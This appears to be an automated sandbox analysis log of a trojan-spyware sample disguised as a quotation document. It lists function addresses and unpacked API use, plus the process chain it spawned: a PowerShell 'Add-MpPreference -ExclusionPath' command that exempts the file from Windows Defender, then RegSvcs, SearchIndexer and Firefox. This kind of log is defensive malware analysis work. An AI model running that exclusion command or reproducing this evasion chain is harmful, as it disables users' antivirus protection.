Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A995C3	10_2_01A995C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A87571	10_2_01A87571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8F43F	10_2_01A8F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019C1460	10_2_019C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8F7B0	10_2_01A8F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A816CC	10_2_01A816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A15630	10_2_01A15630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A65910	10_2_01A65910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D9950	10_2_019D9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019EB950	10_2_019EB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D38E0	10_2_019D38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A3D800	10_2_01A3D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019EFB80	10_2_019EFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A45BF0	10_2_01A45BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A0DBF9	10_2_01A0DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8FB76	10_2_01A8FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A15AA0	10_2_01A15AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A71AA3	10_2_01A71AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A6DAAC	10_2_01A6DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A7DAC6	10_2_01A7DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A43A6C	10_2_01A43A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8FA49	10_2_01A8FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A87A46	10_2_01A87A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019EFDC0	10_2_019EFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A87D73	10_2_01A87D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D3D40	10_2_019D3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A81D5A	10_2_01A81D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8FCF2	10_2_01A8FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A49C32	10_2_01A49C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D1F92	10_2_019D1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8FFB1	10_2_01A8FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01993FD2	10_2_01993FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01993FD5	10_2_01993FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8FF09	10_2_01A8FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D9EB0	10_2_019D9EB0
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7CD51	13_2_02E7CD51
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7EBA4	13_2_02E7EBA4
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7EB9C	13_2_02E7EB9C
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7CEE8	13_2_02E7CEE8
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7CEF4	13_2_02E7CEF4
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E8560F	13_2_02E8560F
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E85614	13_2_02E85614
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E9DC24	13_2_02E9DC24
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E87414	13_2_02E87414
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7EDC4	13_2_02E7EDC4
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7CDA4	13_2_02E7CDA4
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363A352	15_2_0363A352
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036403E6	15_2_036403E6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0358E3F0	15_2_0358E3F0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03620274	15_2_03620274
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036002C0	15_2_036002C0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03608158	15_2_03608158
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03570100	15_2_03570100
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0361A118	15_2_0361A118
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036381CC	15_2_036381CC
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036341A2	15_2_036341A2
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036401AA	15_2_036401AA
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03612000	15_2_03612000
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035A4750	15_2_035A4750
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03580770	15_2_03580770
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0357C7C0	15_2_0357C7C0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0359C6E0	15_2_0359C6E0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03580535	15_2_03580535
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03640591	15_2_03640591
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03632446	15_2_03632446
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03624420	15_2_03624420
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0362E4F6	15_2_0362E4F6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363AB40	15_2_0363AB40
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03636BD7	15_2_03636BD7
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0357EA80	15_2_0357EA80
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03596962	15_2_03596962
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0364A9A6	15_2_0364A9A6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035829A0	15_2_035829A0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0358A840	15_2_0358A840
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03582840	15_2_03582840
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035AE8F0	15_2_035AE8F0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035668B8	15_2_035668B8
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035F4F40	15_2_035F4F40
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03622F30	15_2_03622F30
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035A0F30	15_2_035A0F30
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035C2F28	15_2_035C2F28
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03572FC8	15_2_03572FC8
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0358CFE0	15_2_0358CFE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035FEFA0	15_2_035FEFA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03580E59	15_2_03580E59
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363EE26	15_2_0363EE26
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363EEDB	15_2_0363EEDB
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03592E90	15_2_03592E90
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363CE93	15_2_0363CE93
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0358AD00	15_2_0358AD00
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0361CD1F	15_2_0361CD1F
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0357ADE0	15_2_0357ADE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03598DBF	15_2_03598DBF
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03580C00	15_2_03580C00
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03570CF2	15_2_03570CF2
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03620CB5	15_2_03620CB5
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0356D34C	15_2_0356D34C
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363132D	15_2_0363132D
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035C739A	15_2_035C739A
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036212ED	15_2_036212ED
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0359B2C0	15_2_0359B2C0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035852A0	15_2_035852A0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0364B16B	15_2_0364B16B
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0356F172	15_2_0356F172
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B516C	15_2_035B516C
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0358B1B0	15_2_0358B1B0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363F0E0	15_2_0363F0E0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036370E9	15_2_036370E9
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035870C0	15_2_035870C0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0362F0CC	15_2_0362F0CC
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363F7B0	15_2_0363F7B0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035C5630	15_2_035C5630
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036316CC	15_2_036316CC
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03637571	15_2_03637571
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_036495C3	15_2_036495C3
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0361D5B0	15_2_0361D5B0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03571460	15_2_03571460
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363F43F	15_2_0363F43F
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363FB76	15_2_0363FB76
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035BDBF9	15_2_035BDBF9
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035F5BF0	15_2_035F5BF0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0359FB80	15_2_0359FB80
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03637A46	15_2_03637A46
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363FA49	15_2_0363FA49
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035F3A6C	15_2_035F3A6C
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0362DAC6	15_2_0362DAC6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03621AA3	15_2_03621AA3
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0361DAAC	15_2_0361DAAC
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035C5AA0	15_2_035C5AA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03589950	15_2_03589950
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0359B950	15_2_0359B950
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03615910	15_2_03615910
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035ED800	15_2_035ED800
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035838E0	15_2_035838E0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363FF09	15_2_0363FF09
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03543FD5	15_2_03543FD5
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03543FD2	15_2_03543FD2
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03581F92	15_2_03581F92
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363FFB1	15_2_0363FFB1
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03589EB0	15_2_03589EB0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03637D73	15_2_03637D73
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03583D40	15_2_03583D40
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03631D5A	15_2_03631D5A
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0359FDC0	15_2_0359FDC0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035F9C32	15_2_035F9C32
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0363FCF2	15_2_0363FCF2
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B91F70	15_2_02B91F70
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA0770	15_2_02BA0770
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8CFE0	15_2_02B8CFE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8AFC0	15_2_02B8AFC0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8CDB8	15_2_02B8CDB8
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8CDC0	15_2_02B8CDC0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8B110	15_2_02B8B110
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B8B104	15_2_02B8B104
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B95630	15_2_02B95630
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B93830	15_2_02B93830
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B9382B	15_2_02B9382B
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BABE40	15_2_02BABE40
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345E313	15_2_0345E313
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_03465204	15_2_03465204
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345E1F8	15_2_0345E1F8
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345D778	15_2_0345D778
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345E6B6	15_2_0345E6B6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345E47C	15_2_0345E47C
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0345CA28	15_2_0345CA28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A4F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A3EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A05130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A17E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019BB970 appears 277 times
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: String function: 035C7E54 appears 111 times
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: String function: 035FF290 appears 105 times
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: String function: 035EEA12 appears 86 times
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: String function: 035B5130 appears 58 times
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: String function: 0356B970 appears 277 times

Source: QUOTATION NO REQ-19-000640.exe, 00000000.00000002.1300305161.0000000006D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION NO REQ-19-000640.exe
Source: QUOTATION NO REQ-19-000640.exe, 00000000.00000002.1279802863.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs QUOTATION NO REQ-19-000640.exe
Source: QUOTATION NO REQ-19-000640.exe, 00000000.00000000.1263275267.0000000000252000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesRfw.exeB vs QUOTATION NO REQ-19-000640.exe
Source: QUOTATION NO REQ-19-000640.exe	Binary or memory string: OriginalFilenamesRfw.exeB vs QUOTATION NO REQ-19-000640.exe

Source: QUOTATION NO REQ-19-000640.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QUOTATION NO REQ-19-000640.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, URohiCyOhyISdTIdfl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/7@15/10

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION NO REQ-19-000640.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe"
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Process created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Process created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: rsaenh.dll	Jump to behavior
